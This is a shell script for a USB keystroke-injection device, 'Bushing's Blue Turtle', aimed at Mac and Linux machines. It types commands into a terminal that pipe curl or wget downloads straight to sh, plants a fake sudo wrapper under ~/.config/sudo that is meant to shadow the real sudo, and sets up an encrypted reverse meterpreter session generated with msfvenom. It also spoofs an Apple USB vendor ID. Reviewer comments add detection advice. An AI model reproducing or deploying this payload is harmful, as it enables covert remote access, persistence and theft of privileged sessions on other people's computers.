#!/bin/bash

# Title: Bushing's Blue Turtle
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
#
# Create a wrapper for sudo sessions that
# will live inside ~/.config/sudo and be added
# to the $PATH. After completing the sudo task
# for the user, it will attempt an encrypted reverse
# meterpreter session. The msfvenom payload
# should be in the same directory as shell.py
# Run the following command to generate a payload,
# remember to input the appropriate IP and port
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
#
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
#
# This one's for Bushing. Probably should have written it in Perl.
#
# White | Ready
# Amber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
#
# Reviewer notes (defensive summary of what this file alone shows; the helper
# files pre.sh, post.sh, blueTurtle.py and shell.py are not on this page):
#  - USB side: the device enumerates as Ethernet (ECM) plus an HID keyboard,
#    and in the mac branch presents an Apple USB vendor ID (0x05AC). USB device
#    control that blocks unexpected HID/network composite devices stops the
#    payload before a single keystroke is injected.
#  - Host side: a terminal is opened by injected keystrokes, scripts are fetched
#    from the device's own HTTP server (port 80 on $HOST_IP) and piped straight
#    to sh, and two files are written under ~/.config/sudo/ ("sudo" and ".sudo").
#    Per the header that directory is then placed on $PATH so the wrapper is
#    found in place of the system sudo (presumably done by pre.sh/post.sh; not
#    visible here). Monitoring for writes under that path, for PATH changes in
#    shell startup files, and for curl/wget piped to sh from an interactive
#    terminal covers every observable step in this file.

# LED stage marker; presumably the "White | Ready" state from the table above.
LED SETUP

# Select the macOS variant of the payload; false selects the Linux variant.
mac=false

# Enumerate as USB Ethernet (ECM) plus an HID keyboard. The mac branch also
# sets an explicit vendor/product ID (0x05AC is Apple's USB vendor ID) so the
# device presents as Apple hardware; the Linux branch keeps the device defaults.
if [ "$mac" = true ]
then
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
ATTACKMODE ECM_ETHERNET HID
fi

# Keyboard layout used to turn the QUACK strings below into keystrokes.
DUCKY_LANG us

# Populate $SWITCH_POSITION (the active payload slot, used for the cd below)
# and $HOST_IP (the device's address on the ECM link, used in the typed URLs).
GET SWITCH_POSITION
GET HOST_IP

# Move into this payload's directory so the HTTP server below serves its files.
# NOTE(review): $SWITCH_POSITION is unquoted (shellcheck SC2086).
cd /root/udisk/payloads/$SWITCH_POSITION/

# starting server
# Presumably the "Amber blinking | Waiting for server" state from the table.
LED SPECIAL

# Drop the device's own outbound DNS (UDP/53); the reason is not stated here.
iptables -A OUTPUT -p udp --dport 53 -j DROP
# Python 2 SimpleHTTPServer serving the current directory (the payload dir)
# on port 80, backgrounded; this script never stops it.
python -m SimpleHTTPServer 80 &

# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
# that was brilliant!

# Presumably the "Blue blinking | Attacking" state from the table.
LED ATTACK

# Open a terminal on the target by injected keystrokes, then give it 2 s.
if [ "$mac" = true ]
then
RUN OSX terminal
else
RUN UNITY xterm
fi
QUACK DELAY 2000

# Typed command sequence. This script's own bash strips the double quotes and
# the backslashes before "|" and ">" (assuming QUACK joins its arguments with
# single spaces), so the target shell, not this script, sees the pipe and the
# redirection and expands "~". Every fetch goes to the HTTP server started above.
if [ "$mac" = true ]
then
# pre.sh: fetched and piped straight to sh (contents not on this page).
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
QUACK ENTER
QUACK DELAY 200
# blueTurtle.py becomes ~/.config/sudo/sudo, the wrapper described in the header.
QUACK STRING curl "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo"
QUACK ENTER
QUACK DELAY 200
# shell.py becomes the dot-prefixed companion file ~/.config/sudo/.sudo.
QUACK STRING curl "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo"
QUACK ENTER
QUACK DELAY 200
# post.sh: fetched and piped straight to sh (contents not on this page).
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
QUACK ENTER
QUACK DELAY 200
# Run the wrapper once with its initialization flag.
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK ENTER
QUACK DELAY 200
else
# Same five steps with wget; note this branch delays before pressing Enter,
# whereas the mac branch presses Enter first and then delays.
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh # wget saves to a file by default; "-O -" writes the download to stdout so it can be piped to sh
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo" # TODO(author): Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo" # TODO(author): Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
QUACK DELAY 200
QUACK ENTER
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
QUACK DELAY 200
QUACK ENTER
fi

# One extra Enter, then close the terminal window: Cmd+W on macOS after a
# longer wait, or a typed "exit" on Linux.
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
QUACK DELAY 5000 #seems like macs need some extra time on this
QUACK GUI w
else
QUACK STRING exit
QUACK DELAY 200
QUACK ENTER
fi
# Presumably the "Green | Finished" state from the table.
LED SUCCESS